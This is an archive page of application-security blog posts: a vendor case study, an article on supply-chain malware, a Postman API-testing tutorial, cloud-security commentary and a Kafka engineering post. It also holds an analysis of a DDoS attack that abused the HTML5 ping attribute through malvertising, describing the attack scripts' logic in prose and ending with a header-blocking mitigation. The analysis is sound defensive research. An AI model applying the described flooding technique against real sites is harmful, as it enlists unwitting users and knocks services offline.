Category Archives: Application Security

Casino Goes All In and Wins Big with Imperva Security

There’s no good time to be hit by ransom-seeking DDoS attackers. For one casino-entertainment provider, the timing was particularly bad — right before one of its largest online poker events in 2016.

The casino, which generates multiple billions in revenue per year, leveraged Imperva’s emergency onboarding service, allowing us to onboard them to our DDoS Protection service within minutes.

(More Imperva customer case studies are available here.)

Sure enough, the casino was targeted with DDoS attacks throughout the weekend, all of which Imperva successfully mitigated within 10 seconds (we are the only service provider with an SLA-backed guarantee to detect and block any website attack, of any size or duration in 10 seconds or less).

Mitigating these attacks led the casino to go all in on Imperva, moving all of its sites and traffic to Imperva’s Cloud Application Security, and a complete replacement of other competing solutions.

The casino now uses Cloud WAF, CDN, DDOS Protection and Global Site Load Balancing. Once it saw the strength of our WAF solutions, it quickly adopted our Database Security offerings as well. It now uses our Data Risk Analytics and Data Activity Monitoring to provide a full defense-in-depth solution. It is also considering adding our coming Cloud Data Security offering (currently in beta, sign up here) as well.

While we first won this customer a few years ago, we’ve continued to expand our business and services provided to them (which all of our customers can take advantage of with our FlexProtect plans). No poker face can hide the satisfaction of making a competitor fold by simply demonstrating a customer-first mindset.   

Imperva protected the casino’s business first and discussed contracts second. This showed the casino that we are a true partner in protecting their business.


Is your organization, like this casino, looking to implement a full defense-in-depth security strategy for ultimate protection? Check out this recently-recorded webinar, “Five Best Practices for Application Defense in Depth,” featuring Forrester security analyst Amy DeMartine, Imperva SVP and Fellow, Terry Ray, and Imperva CTO, Kunal Anand.  

The post Casino Goes All In and Wins Big with Imperva Security appeared first on Blog.

SecurityWeek RSS Feed: Bad Bots Steal Accounts, Content and Skew the Web Ecosystem

Bad bots are a continuing problem. Good bots, those that perform welcome and benign activities -- such as search engine crawlers like Googlebot and Bingbot -- are welcome. Bad bots, those that scrape and steal content, mine for competitive data, undertake credential stuffing, ad fraud, transaction fraud and more, are not.

read more

SecurityWeek RSS Feed

Google introduces many G Suite security enhancements

Last week, the big news from Google Cloud Next 2019 was that phones running Android 7.0 or higher can be turned into a security key for G Suite account 2-step verification. But at the event Google also announced a number of G Suite enhancements, many of which are aimed at improving user and enterprise security. Some of the features are still in beta. Some are available to users of all G Suite editions, others only … More

The post Google introduces many G Suite security enhancements appeared first on Help Net Security.

What Happens When Malware Sneaks Into Reputable Hardware, Applications and App Stores?

To avoid malware, you should always get hardware and software from official, authorized and reputable sources and vendors, right? But what happens when those same sources actually contain or deliver malicious payloads?

In recent months, such bad code has appeared out of the box in mobile hardware and in reputable and seemingly legitimate apps from authorized app stores. Perhaps it’s time for a more sophisticated and nuanced policy.

Malicious code is a widespread, harmful and growing problem, and threat actors are increasingly targeting businesses and enterprises, according to Malwarebytes “2019 State of Malware” report. The report found that business detections of malware increased nearly 80 percent over the last year, with the largest increases coming from Trojans, riskware tools, backdoors and spyware.

The report also detailed a growing creativity and sophistication in delivery — including the Holy Grail of attack vectors: delivery through official, authorized and reputable sources. Let’s explore some recent examples.

Digitally Signed, Directly Delivered Malware

Hundreds of thousands of ASUS computers were recently infected by malicious code in an attack campaign known as Operation ShadowHammer. (ASUS has since removed the code with a security update.)

The infection didn’t come by way of insecure websites or email phishing attacks. Instead, it arrived via the ASUS Live Update tool and was authenticated by the company’s legitimate code-signing certificates. The CCleaner-like backdoor scanned for each victim’s media access control (MAC) address, hunting for one of 600 targeted MAC addresses. Once a target machine was identified, a malicious payload of unknown purpose was loaded from a remote server.

This entire series of events began with attackers gaining access to ASUS’ certificates, which were used to sign the code through ASUS’ supply chain, according to researchers from both Kaspersky Lab and Symantec.

Operation ShadowHammer has won instant fame as the poster child for the growing threat of supply chain attacks in which malicious items are installed during a product’s manufacturing, at some point between assembly and reception by the customer, or while being updated with signed and authorized software updates.

Can You Pick Up Some Malware From the (App) Store?

Another efficient way to deliver malware is through applications. This is easiest from unauthorized app stores because they have less sophisticated — or nonexistent — checks for bad code.

But it’s also common for malware to slip past those checks on legitimate app stores. An analysis by Check Point researchers found a particular strain of adware in 206 Android apps on the Google Play store, which were collectively downloaded around 150 million times. These apps were compromised by SimBad malware, which is embedded in a software development kit (SDK) on the apps.

According to Google, the install rate of potentially harmful applications (PHA) from Google Play was around 0.04 percent in 2018. However, that very low rate shouldn’t give comfort; it simply means a PHA install rate of one out of every 2,500 downloads. Therefore, a company with thousands of employees is likely to have at least some PHAs inside its firewall.

In another example, a compromised but otherwise legitimate weather forecast app, developed by Alcatel’s parent company, the TCL Corporation, was available as a standalone app on the Google Play store and downloaded more than 10 million times. The weather app harvested user data, such as location, email address, International Mobile Equipment Identity (IMEI) codes and other information, and sent it to a remote server. The app also subscribed victims to phone number services that incurred charges on phone bills.

What’s more, Alcatel bundled the app on its Pixi 4 and A3 Max smartphones, meaning brand-new phones purchased through legitimate channels actually contained the malware.

To date, it’s unclear how exactly the malicious code got into the weather app. The leading theory appears to be that the PC used by a TCL developer was hacked.

The Worst Thing About Bad Code From Good Sources

Matt Blaze, professor of law and computer science at Georgetown University, wrote in a New York Times opinion piece that despite attacks such as Operation ShadowHammer, it’s still more important than ever to keep software up to date.

In fact, according to Blaze, the most dangerous aspect of the ASUS supply chain attack is the risk that people might turn off automatic updates and avoid installing critical patches.

“It might be tempting to immediately disable these mechanisms … but that would be a terrible idea, one that would expose you to far more harm than it would protect against,” wrote Blaze. “In fact, now would be a fine time to check your devices and make sure the automatic system update features are turned on and running.”

It’s also worth noting that such attacks are far more likely with the prevalence of internet of things (IoT) devices. The future of IT will probably involve far more malicious payloads in legitimate products from authorized sources, but it’s still as important as ever to favor the authorized source over the unauthorized.

Lastly, organizations should always add an extra layer of security by monitoring third-party connections with a unified endpoint management (UEM) solution. The official source, the authorized source and the reputable source are only the first line of defense against increasingly aggressive and creative malware threats, and will continue to function as such. The next lines of defense are up to you.

The post What Happens When Malware Sneaks Into Reputable Hardware, Applications and App Stores? appeared first on Security Intelligence.

The Ping is the Thing: Popular HTML5 Feature Used to Trick Chinese Mobile Users into Joining Latest DDoS Attack

DDoS attacks have always been a major threat to network infrastructure and web applications.

Attackers are always creating new ways to exploit legitimate services for malicious purposes, forcing us to constantly research DDoS attacks in our CDN to build advanced mitigations.

We recently investigated a DDoS attack which was generated mainly from users in Asia. In this case, attackers used a common HTML5 attribute, the <a> tag ping, to trick these users to unwittingly participate in a major DDoS attack that flooded one web site with approximately 70 million requests in four hours.

Rather than a vulnerability, the attack relied on turning a legitimate feature into an attack tool. Also, almost all of the users enlisted in the attack were mobile users of the QQBrowser developed by the Chinese tech giant Tencent and used almost exclusively by Chinese speakers. Though it should be noted that this attack could have involved users of any web browser and that recent news could ensure that these attacks continue to grow — and we’ll explain why later in the article.

How They Did It

Ping is a command in HTML5 that specifies a list of URLs to be notified if the user follows a hyperlink. When the user clicks on the hyperlink, a POST request with the body “ping” will be sent to the URLs specified in the attribute. It will also include headers “Ping-From”, “Ping-To” and a “text/ping” content type.

This attribute is useful for website owners to monitor/track clicks on a link. Read more here.

A simple HTML page containing a link with “ping” attribute
A POST request with the “ping” body

Notification services using ping are not new. The Pingback feature in the popular WordPress CMS notifies a web site owner if a link is clicked. Attackers have used Pingbacks to conduct DDoS attacks by sending millions of requests to vulnerable WordPress instances that are then forced to “reflect” the pingback requests onto the targeted web site.

Besides using the HTML5 ping, this DDoS attack also enlisted mostly mobile users from the same part of the world. While we’ve observed mobile browser-based attacks before, a DDoS attack mostly using the same mobile browser and from the same region is very uncommon.

About 4,000 user IPs were enlisted in the attack, with a significant percentage from China. They generated a peak 7,500 Requests per Second (RPS) during the 4 hour attack, producing an overall 70 million requests.

Diving into the logs to understand the attack, we noticed that all the malicious requests contained the HTTP Headers “Ping-From” and “Ping-To”. This was the first time we had seen a DDoS attack that utilized the <a> tag ping attribute.

Both Ping-Form and Ping-To values referred to the “” URL.

A sample of the requests that were generated by the DDoS attack

This suspicious URL contains a very simple HTML page with two external JavaScript files: “ou.js” and “yo.js”.”  source code

“ou.js” had a JavaScript array containing URLs — the targets of the DDoS attack.

“OU.JS” JavaScript source code

“yo.js” had a function which randomly selects a target from the array and creates a <a> tag with “ping” attribute pointing to the target URL.

Every second, a <a> tag was created and clicked programmatically causing a “ping” request to be sent to the target website.

Legitimate users that were tricked into visiting this suspected website unwillingly participated in a DDoS attack. The pings will continue to be generated as long as the user stays on this page.

“yo.js” JavaScript source code

The question is: How did the mastermind keep users on this web site in order to keep triggering the ping requests and maintain the ferocious DDoS attack?

We noticed that the User-Agent in the requests is associated with the popular Chinese chat app, WeChat. WeChat uses a default mobile browser to open links in messages. As QQBrowser is very popular in China, many users pick it as a default browser for their smartphone.

Our theory is that social engineering combined with malvertising (malicious advertising) that tricked unsuspecting WeChat users into opening the browser. Here’s one possible scenario:

  1. The attacker injects malicious advertising that loads a suspected website
  2. Link to the legitimate website with the malicious ad in an iframe is posted to a large WeChat group chat
  3. Legitimate users visit the website with the malicious ad
  4. JavaScript code executes, creating a link with the “ping” attribute that the user clicks on
  5. An HTTP ping request is generated and sent to the target domain from the legitimate user’s browser

Final Words

While QQBrowser was overwhelmingly used in this DDoS attack due to its popularity with WeChat users, other web browsers can also be exploited by this ping attack. Worse, the browser makers are taking steps to make it harder for users to turn off the ping feature in their browser that would allow them to avoid being enlisted in such an attack.

According to an article earlier this week in Bleeping Computer tech news site, newer versions of Google Chrome, Apple’s Safari and Opera no longer let you disable hyperlink auditing, aka pings. This is a concern for web architects and security pros worried about this method of launching DDoS attacks spreading.

Fortunately, web site and application operators have some control. If you are not expecting or do not need to receive ping requests to your Web server, block any Web requests that contain “Ping-To” and/or “Ping-From” HTTP headers on the edge devices (Firewall, WAF, etc.). This will stop the ping requests from ever hitting your server. (Note: Imperva DDoS Protection is already updated to prevent ping functionality abuse targeted at your sites.)

Application DDoS attacks are here to stay and will continue to evolve at incredible rates. Attackers are always finding new and creative ways to abuse legitimate services for malicious purposes. At Imperva, we are dedicated to detecting and combating these threats on your behalf.

The post The Ping is the Thing: Popular HTML5 Feature Used to Trick Chinese Mobile Users into Joining Latest DDoS Attack appeared first on Blog.

Better API Penetration Testing with Postman – Part 3

In Part 1 of this series, we got started with Postman and generally creating collections and requests. In Part 2, we set Postman to proxy through Burp Suite, so that we could use its fuzzing and request tampering facilities. In this part, we will dig into some slightly more advanced functionality in Postman that you almost certainly want to leverage.

Collection Variables

Variables in Postman can be used in almost any field in the request. The syntax is to use double curly-braces on either side of them. There are a few places I can define them. If they’re relatively static, maybe I set them as collection variables. For example, I’ve been using http://localhost:4000 as my test host. If I change the test API’s port from 4000 to 4001, I don’t want to have to edit the URL of each request. Here’s how move that into a Collection variable. First, I open the edit dialog for that collection on the Collections list in the menu side-bar. I can either click the ... button or I can right click the collection name itself. In either case, I get the same context menu, and I want to choose Edit.

This will open a dialog for editing the collection. The default view has the name of the collection and a description textbox, but there’s also a row of tabs between those two fields.

One of those tabs is called Variables. That’s the one we want, and click it will open another dialog, for editing variables.

Postman collection variable editing interface

It has a grid containing a Variable column for the variable name, and Initial Value column, and a Current Value column. The differences between those two value columns relate to syncing through Postman’s paid features. What matters here is that you will enter the initial value, and then tab into the current value field. This will automatically populate the current initial value into the current value field, and it will look as pictured. Now I have a collection variable called api_host, with a value of http://localhost:4000. I’m done editing variables, so I click the Update button.

It’s time to modify my requests to reference that variable instead of having their own hard-coded hostname and port.

Postman request, with the URL changed to point to a variable

I simply replace the applicable part of each URL with the placeholder: {{api_host}}
Hovering over the placeholder will expand it to tell me the value and scope. There’s some color-coding here to help us out too. The text turns orange when it’s valid, but would be red if I put an invalid variable name in.

I still have to update each request this once, to make them use the variable. But in the future, if it changes port, if it switches to HTTPS, or if I deploy my test API to a completely different host; I can just go back into my collection variables and update the values in there, and my requests will all receive the change accordingly.

Now collection variables are fine for relatively static bits that won’t change much, but what if I’m testing multiple environments, deployments, or even multiple tenants in a multi-tenant solution? It’s likely I’ll want to use the same collection of requests but with different sets of variables. Environment Variables deal with that problem.

Environment Variables

You may have already noticed their interface on the top-right of the window. Let’s take a look:

Environment variable interface in Postman
  1. Environment selector drop-down. It drops down to select an environment.
  2. Quick-look button, to take a peek at what’s set in your environment
  3. Manage Environments button, where the real editing happens.

To get started, we’ll want to click the Manage Environments button. That will open a large, but relatively empty dialog, with an Add button at the bottom. Click the Add button.

You will be presented with another dialog. This one looks almost the same as the Collection Variables dialog, except that it takes a name.

I’ve named mine LocalTest.

I’ve also added too variables, one called bearer_token, with a value of foo. The other called user_id with a value of 1.

Once I’ve finished editing, I click the Add button near the bottom of the dialog, and then close out of the Manage Environments dialog. There’s one final, important, oft-forgotten step before I can use the variable in this environment. I need to choose it from the Environment selector drop-down.

And now these additional variables are accessible in the same way as the api_host was above: {{bearer_token}} and {{user_id}}

Route Parameters

It’s common on modern APIs to use route parameters. Those are values supplied as part of the main path on the URL. For example, consider the following: http://localhost:4000/user/42/preferences

The number 42 in a URL like that is actually a parameter, most likely a user ID in this example. When the server-side application routes the incoming request, it will extract that value and make it readily available to the function or functions that ultimately handle the request and construct the response. This is a route parameter. It may be convenient to make this easily editable or Postman. The syntax for that is simply to put it directly into the URL in the form of a colon (:) followed by the parameter name. For this example request in Postman, I would enter it as {{api_host}}/user/:userId/preferences. Then, on the Params tab of the request, I can see it listed and set its value. In the image below, I set it to the user_id variable that I specified in the environment variables earlier.

I could have written my variable directly into the URL as well, but this way is cleaner, in my opinion.

Bearer Tokens

Imagine a scenario where you issue some sort of auth request, it responds with a bearer token, and then you need to use that token in all of your other requests. The manual way to do it would probably be to just issue the auth request, and then copy and paste the token from the response into an environment variable. All the other requests can then use that environment variable.

That will work okay, but it can be a pain if you have a token with a short lifespan. There’s a more elegant solution to this problem. Consider the following response:

We’ve issued our request and received a JSON response containing our token. Now I want to automate the process of updating my environment variable with the new bearer token. On the requests interface, there are several tabs. The one furthest to the right is called Tests. This is mainly for automatically examining the response to determine if the API is broken, like a unit test. But we can abuse it for our purpose with just a couple JavaScript statements.

I add the script above, click Save, and then run my request again. And it appears that everything happened exactly the same as the first time. But if I use the Quick Look button to see my environment variables…

I can see that the Current Value has been updated automatically. That’s the first step – I now have the value stored in a place that I can easily reference, but it doesn’t put that Bearer token on my requests for me. I have two options for that. The first option is that if I got to the request’s Authorization tab, I can set a bearer token from the type drop-down, and point it at my variable.

This approach is alright, but then I need to remember to set it on each request. But the default Authorization Type on each new request is Inherit auth from parent. The parent, in this case, is the Collection. So if I switch this request back to that default type, I can then go into the Edit Collection settings (same context menu as I went to for Collection variables), and go to the Collection’s Authorization tab.

It presents almost the same interface as the Authorization on the request, and I can set it the same way. The difference now is that it’s managed in one place – in the collection. And every new request I create will include that bearer token by default, unless I specifically change the type on that request. For example, my Authentication request likely doesn’t need the bearer token, so I might then set the type to No Auth on that request’s Authorization tab.

Occasionally, I run into applications where an XML or HTML body is returned containing the value that I want to extract. In those cases, the xml2Json function, which is built-in, is helpful for parsing the response.

Using xml2Json to marshall an HTML body into a JSON object

As one more note – the is the Pre-request Script tab, which uses the same basic scripting interface. As you might expect, it executes before the request is sent. I know some of my colleagues use it to set the Bearer tokens, which is a totally valid strategy, just not the approach I use. It can also be helpful where you need a nonce, although that’s again not something I typically encounter.

Next Steps

In Part 4, we will wrap up the series by incorporating some Burp Suite extensions to really power-up our penetration testing tool-chain. But this whole series is really dealing with tooling. There is a lot of background knowledge that can be a huge difference-maker for API testing, from a good understanding of OAuth, to token structures like JWT and SAML, to a really good understanding of CORS.

How to Balance Speed and Security in Your Application Security Program

In today’s ever-evolving digital trust landscape, the term DevOps has become synonymous with speed. If you want to compete, you need to build quality code quickly. Yet as quickly as companies are able to innovate, the bad guys are constantly developing new ways to exploit vulnerable applications.

With that in mind, business leaders and security managers need an application security solution that integrates into the software development life cycle (SDLC) to maintain speed to market. However, there is a delicate balance between security and speed, and striking it is an exercise in understanding your objectives and risks and empowering your developers to lead the charge.

Understand Your Application Security Objectives

If your priority is to simply check the box, so to speak, to satisfy regulatory requirements, it’s important to consider that compliance does not always equal security. That’s not to say achieving compliance is a fast or easy task, but if your goal is to prevent a breach by writing secure software, you need to go beyond just compliance.

Most regulatory requirements are painted with a broad brush and don’t take the nuances of your application into consideration. Compliance is a point-in-time endeavor to check a specific set of requirements that could quickly become irrelevant given the lightning-fast pace of application development. That’s why instituting security throughout the development pipeline is crucial to delivering secure code on time. When security is baked into your application’s DNA from the start, compliance should come easy. Furthermore, you can set yourself apart from the rest of the market by establishing security policies based on the needs of the business.

What Makes a Balanced AppSec Program?

There’s a common misconception that only certain types of application testing can match the speed of Agile or DevOps methodologies. Because of this, many organizations will settle for the type of application testing solution they think satisfies their delivery timelines.

There is no single magic bullet that will provide end-to-end security coverage across your entire app portfolio. Static analysis cannot test for broken authentication, just like dynamic analysis cannot test for insecure data flows. It takes a balanced approach to testing and leveraging different technologies to have a fully mature application security program.

The good news is that application security technology has advanced leaps and bounds over the last decade and is shifting left with the rest of the industry. Static analysis can be integrated at the earliest stages of the development life cycle, and dynamic analysis can be applied to QA testing and even functional testing to only check for certain code changes. Taking the time to understand your risk tolerance and adopting the right blend of technologies can help ensure that you’re delivering quality secure code on time.

Empower Your Developers to Be Security Standard-Bearers

Part of the nuance of balancing security and speed is finding security flaws quickly so you can remediate rapidly. You may have had a high school coach or teacher who taught you how to fail so that you may learn from your mistakes. The same applies to security.

It’s important to recognize real security vulnerabilities early and have an action plan in place to remediate them before they are pushed into production. A major component of this approach is a development team that is backed by a thorough security training curriculum and empowered to take remediation into its own hands. For starters, consider the most common recurring security flaws across your applications, such as SQL injection or cross-site scripting (XSS), and develop a pointed training curriculum to educate developers on recognizing and remediating those flaws accordingly.

Take the time to understand the different types of vulnerabilities and their context within your applications’ design. Naturally, you’ll want to address any high-severity flaws, but also consider whether they can be exploited by an attacker. Is this a critical vulnerability? Is the function within the call path of the application? Chances are, there are dozens of medium-severity vulnerabilities that have a higher risk of exploitation than any of the high-severity ones.

All Apps Are Not Created Equal

Not all applications are created equal, because all applications do not pose the same level of risk across the board. You need to have a way to manage and prioritize your risks — not to mention scarce resources — across your application landscape.

Unfortunately, we don’t live in a perfect world. However, having a grasp of your application landscape, applying the right technology in the right place and empowering your developers to take ownership of secure coding practices will ensure that you don’t have to pick sides in balancing speed and security.

Read our e-guide to learn more

The post How to Balance Speed and Security in Your Application Security Program appeared first on Security Intelligence.

Is Cloud Business Moving too Fast for Cloud Security?

As more companies migrate to the cloud and expand their cloud environments, security has become an enormous challenge. Many of the issues stem from the reality that the speed of cloud migration far surpasses security’s ability to keep pace.

What’s the holdup when it comes to security? While there’s no single answer to that complicated question, there are many obstacles that are seemingly blocking the path to cloud security.

In its inaugural “State of Hybrid Cloud Security” report, FireMon asserted that not only are cloud business and security misaligned, but existing security tools can’t handle the scale of cloud adoption or the complexity of cloud environments. A lack of security budget and resources compounds these concerns.

What Are the Risks of Fast-Paced Cloud Adoption?

Of the 400 information security professionals who participated in the survey, 60 percent either agreed or strongly agreed that cloud-based business initiatives move faster than the security organization’s ability to secure them. Another telling finding from a press release associated with the report is that 44 percent of respondents said that people outside of the security organization are responsible for securing the cloud. That means IT and cloud teams, application owners and other teams are tasked with securing cloud environments.

Perhaps it’s coincidental, but 44.5 percent of respondents also said that their top three challenges in securing public cloud environments are lack of visibility, lack of training and lack of control.

“Because the cloud is a shared security model, traditional approaches to security aren’t working reliably,” said Carolyn Crandall, chief deception officer at Attivo Networks. “Limited visibility leads to major gaps in detection where an attacker can hijack cloud resources or steal critical information.”

While the emergence of the cloud has enabled anytime, anywhere access to IT resources at an economical cost for businesses, cloud computing also widens the network attack surface, creating new entry points for adversaries to exploit.

The Misery of Misconfiguration

As cloud-based businesses continue to quickly spin up new environments, misconfiguration issues have resulted in security nightmares, particularly over the last several months. According to Infosecurity Magazine, a misconfiguration at a California-based communications provider left 26 million SMS messages exposed in November 2018, and in December 2018, IT misconfigurations exposed the data of more than 120 million Brazilians.

From Amazon Web Services (AWS) bucket misconfigurations to Elasticsearch or MongoDB blunders, companies across all sectors have had their names in headlines not because of a data breach, but because human error left plaintext sensitive data exposed, often without a password.

Getting Cloud Security up to Speed

As is most often the case, the ability to enhance cloud security comes down to the availability of resources — 57.5 percent of respondents to the FireMon survey said that less than 25 percent of the security budget is dedicated to cloud security.

It’s also time to move beyond the misconception that cloud providers are delivering security in the cloud.

“Organizations new to the cloud will typically think that the cloud provider handles security for them, so they are already covered. This is not true; the AWS Shared Security Model says that while AWS handles security of the cloud, the customer is still responsible for handling security in the cloud. Azure’s policy is similar,” said Nitzan Miron, vice president of product management, application security services at Barracuda.

In short, securing all the applications and databases running in cloud environments is the responsibility of the business. That’s why organizations need to start thinking differently about their security frameworks and how to design controls that will secure a complex, borderless environment. Within that evolving security framework, organizations not only need strategies for scalable threat detection across cloud environments, but the endpoints accessing those cloud environments also need to be able to detect threats.

“Reducing risk will require adding capabilities to monitor user activity in the cloud, unauthorized access, as well as any malware infiltration. They will also need to add continuous assessment controls to address policy violations, misconfigurations, or misconduct by their suppliers and contractors,” Crandall said.

DevSecOps to the Rescue?

Another reason cloud security is lagging is rooted in the highly problematic division of teams. According to Miron, it’s often the case that security teams are separate from Ops/DevOps teams, which causes security to move much slower.

When the DevOps team decides to move to the cloud, it may be months before the security team gets involved to audit what they are doing.

“The long-term solution to this is DevSecOps,” said Miron.

Let it not be lost on anyone that “Sec” is supplanted right between “Dev” and “Ops.” When it comes to development, security is not something that can be tacked on at the end. It has to be central to the DevOps process.

From database exposure to application vulnerabilities, security in the cloud is complicated; and the complexities are compounded when teams don’t have adequate resources. Businesses that want to advance cloud security at scale need to invest in both the people and the technology that will reduce risks.

The post Is Cloud Business Moving too Fast for Cloud Security? appeared first on Security Intelligence.

Clouded Vision: How A Lack Of Visibility Drives Cloud Security Risk

Enterprises continue to migrate to the cloud with many using their cloud environments to support mission critical applications. According to RightScale, enterprises are on average running 38 percent of their workloads

The post Clouded Vision: How A Lack Of Visibility Drives Cloud Security Risk appeared first on The Cyber Security Place.

Identity-Defined Security is Critical in a Digital Transformation World

In an economy driven by information, data has always been every organization’s most important asset, and cyber-criminals know this, which is why they almost always start an attack by compromising

The post Identity-Defined Security is Critical in a Digital Transformation World appeared first on The Cyber Security Place.

Making Our Security Portfolio Simpler — and Better

Since its inception in 2009, Incapsula has been a proud part of Imperva, the analyst-recognized cybersecurity leader.

However, cybersecurity needs are evolving, and so are we.

On April 7th, we will officially retire All of the great Incapsula web site content that wasn’t already migrated to will move on that date. You can continue to access Incapsula Cloud Application Security product functionality and features from the web site as well as access customer support.

Also, we will not be signing up any new customers to legacy Incapsula web plans. Incapsula features are now part of our Application Security offering, which is available through our new FlexProtect licensing plans and in the AWS marketplace.

For existing customers and partners, we’re ensuring the transition will be as smooth as possible. There will be no changes to:

  • Incapsula Cloud WAF product itself (only the web site);
  • customer plans — customers will get to keep their existing plan as-is;
  • users. While the login will move to, the experience for existing MY users, as well as APIs and other devOps projects using, will NOT change;
  • the Incapsula Terms of Use and Privacy Policy;
  • the availability of Incapsula documentation and support, which you will be able to find by signing into the support page.

We’re simplifying our product portfolio and unifying our digital assets to ensure a better, more consistent customer experience for all. This ensures that we can continue to be your champion in the fight to secure data and applications, and defend your business growth, today AND tomorrow.

If you have any questions, please contact us via our Web site or your local account manager. Thank you for joining us as we continue our transformation into the New Imperva.

The post Making Our Security Portfolio Simpler — and Better appeared first on Blog.

The security challenges that come with serverless computing

Serverless computing (aka Function-as-a-Service) has been a boon to many enterprises: it simplifies the code development and deployment processes while improving utilization of server resources, minimizing costs and reducing security overhead. “Serverless infrastructure adoption is growing faster than most people realize,” says Doug Dooley, COO of modern application security provider Data Theorem. “It is outpacing virtual container (e.g., Docker) adoption by more than 2X in the past 4 years. And the impact of this rapid … More

The post The security challenges that come with serverless computing appeared first on Help Net Security.

Not just for Processing: How Kafka Streams as a Distributed Database Boosted our Reliability and Reduced Maintenance

network nodes distributed database Apache Kafka

The Apache Kafka Streams library is used by enterprises around the world to perform distributed stream processing on top of Apache Kafka. One aspect of this framework that is less talked about is its ability to store local state, derived from stream processing.

In this blog post we describe how we took advantage of this ability in Imperva’s Cloud Application Security product. Using Kafka Streams, we built shared state microservices that serve as fault-tolerant, highly-available Single Sources of Truth about the state of objects in the system, which is a step up both in terms of reliability and ease of maintenance.

If you’re looking for an alternative approach to relying on a single central database to maintain the formal state of your objects, read on…

Why we felt it was time for a change for our shared state scenarios

At Imperva, we need to maintain the state of various objects based on the reports of agents (for example: is a site under attack?). Prior to introducing Kafka Streams, we relied in many cases on a single central database (+ Service API) for state management. This approach comes with its downsides: in data-intensive scenarios, maintaining consistency and synchronization becomes a challenge, and the database can become a bottleneck or be prone to race conditions and unpredictability.

Not just for Processing: how Kafka Streams as a Distributed Database Boosted our Reliability and Reduced MaintenanceIllustration 1: typical shared state scenario before we started using Kafka and Kafka Streams: agents report their views via API, works with single central database to calculate updated state

Enter Kafka Streams – shared state microservices creation made easy

About a year ago, we decided to give our shared state scenarios an overhaul that would address these concerns. Kafka Streams immediately came to mind, being scalable, highly available and fault-tolerant, and providing the streams functionality (transformations / stateful transformations) that we needed – not to mention Kafka being a reliable and mature messaging system.

At the core of each shared state microservice we built was a Kafka Streams instance with a rather simple topology. It consisted of 1) a source, 2) a processor with a persistent key-value store, and 3) a sink:

Not just for Processing: how Kafka Streams as a Distributed Database Boosted our Reliability and Reduced MaintenanceIllustration 2: default topology for our shared state scenario microservices’ streams instances, Note there’s also a store used for persisting scheduling metadata, which will be discussed in a future post

In this new approach, agents produce messages to the source topic, and consumers, e.g. a mail notification service, consume the calculated shared state via the sink topic.

Not just for Processing: how Kafka Streams as a Distributed Database Boosted our Reliability and Reduced MaintenanceIllustration 3: new flow example for shared state scenario: 1) agent produces message to source topic in Kafka; 2) shared state microservice (using Kafka Streams) processes it and writes calculated state to sink topic in Kafka; and 3) consumers consume new state

Hey, that built-in key-value store is quite useful!

As mentioned above, our shared state scenario’s topology includes a key-value store. We found several uses for it, and two of these are described below.

Use case #1: using the key-value store in calculations

Our first use for the key-value store was to store auxiliary data that we needed for calculations. For example, in some cases our shared state is calculated based on a majority vote. The store allowed us to persist all the agents’ latest reports about the state of some object. Then, upon receiving a new report from some agent, we could persist it, retrieve all the other agents’ reports from the store and re-run the calculation.

Illustration 4 below describes how we made the key-value store available to the process method of the processor, so we could use it when processing a new message.

Not just for Processing: how Kafka Streams as a Distributed Database Boosted our Reliability and Reduced MaintenanceIllustration 4: making the key-value store available to the process method of the processor (each shared state scenario then needs to implement the doProcess method)

Use case #2: creating a CRUD API on top of Kafka Streams

After our basic flow was in place, we sought to also provide a RESTful CRUD API in our shared state microservices. We wanted to allow retrieving the state of some/all objects, as well as setting/purging the state of an object (useful for backend maintenance).

To support the Get State APIs, whenever we calculate a state during processing, we persist it to the built-in key-value store. It then becomes quite easy to implement such an API using the Kafka Streams instance, as can be seen in the snippet below:

Not just for Processing: how Kafka Streams as a Distributed Database Boosted our Reliability and Reduced MaintenanceIllustration 5: using built-in key-value store to quickly obtain previously-calculated state of object

Updating the state of an object via the API was also not difficult to implement. It basically involved creating a Kafka producer, and producing a record consisting of the new state. This ensured that messages generated by the API were treated in exactly the same way as those coming from other producers (e.g. agents).

Not just for Processing: how Kafka Streams as a Distributed Database Boosted our Reliability and Reduced MaintenanceIllustration 6: setting state of an object can be done using Kafka producer

Slight complication: multiple Kafka partitions

Next, we wanted to distribute the processing load and improve availability by having a cluster of shared state microservices per scenario. Set-up was a breeze: after configuring all instances to use the same application ID (and the same bootstrap servers), everything pretty much happened automatically. We also defined that each source topic would consist of several partitions, with the aim that each instance would be assigned a subset of these.

A word about preserving the state store, e.g. in case of failover to another instance, is in order here. Kafka Streams creates a replicated changelog Kafka topic (in which it tracks local updates) for each state store. This means that the state store is constantly backed up in Kafka. So if some Kafka Streams instance goes down, its state store can quickly be made available to the instance that takes over its partitions. Our tests showed that this happens in a matter of seconds, even for a store with millions of entries.

Moving from one shared state microservice to a cluster of microservices made it less trivial to implement the Get State API. Now, each microservice’s state store held only part of the world (the objects whose key was mapped to a specific partition). We had to determine which instance held the specified object’s state and did this using the streams metadata, as can be seen below:

Not just for Processing: how Kafka Streams as a Distributed Database Boosted our Reliability and Reduced MaintenanceIllustration 7: we use streams metadata to determine which instance to query for specified object’s state – similar approach was taken for GET ALL API

Main takeaways

  • Kafka Streams’ state stores can serve as a de facto distributed database, constantly replicated to Kafka
    • CRUD API can easily be built on top of it
    • Multiple partitions require a bit of extra handling
  • It’s also possible to add one or more state stores to a streams topology for the purpose of storing auxiliary data. It can be used to:
    • persist data that is needed for state calculation during stream processing
    • persist data that can be used during next init of the streams instance
    • much more…

These and other benefits make Kafka Streams a strong candidate for maintaining global state of a distributed system like ours. It has proven to be quite robust in our production environment (practically no lost messages since its deployment), and we look forward to expanding on its potential further!

The post Not just for Processing: How Kafka Streams as a Distributed Database Boosted our Reliability and Reduced Maintenance appeared first on Blog.

Radware Blog: Are Connected Cows a Hacker’s Dream?

Humans aren’t the only ones consumed with connected devices these days. Cows have joined our ranks. Believe it or not, farmers are increasingly relying on IoT devices to keep their cattle connected. No, not so that they can moo-nitor (see what I did there?) Instagram, but to improve efficiency and productivity. For example, in the […]

The post Are Connected Cows a Hacker’s Dream? appeared first on Radware Blog.

Radware Blog

Web-based Application Security Part 1: Open Redirection Vulnerability

Web application security, which applies specifically to the security of websites, web applications and web services, is increasingly becoming a top priority for organizations worldwide. To understand why, consider that one

The post Web-based Application Security Part 1: Open Redirection Vulnerability appeared first on The Cyber Security Place.

Infosecurity.US: New Firefox Browser To Feature Anti-Fingerprinting Capabilities

Um, no, not that kind of fingerprint…

Um, no, not that kind of fingerprint…

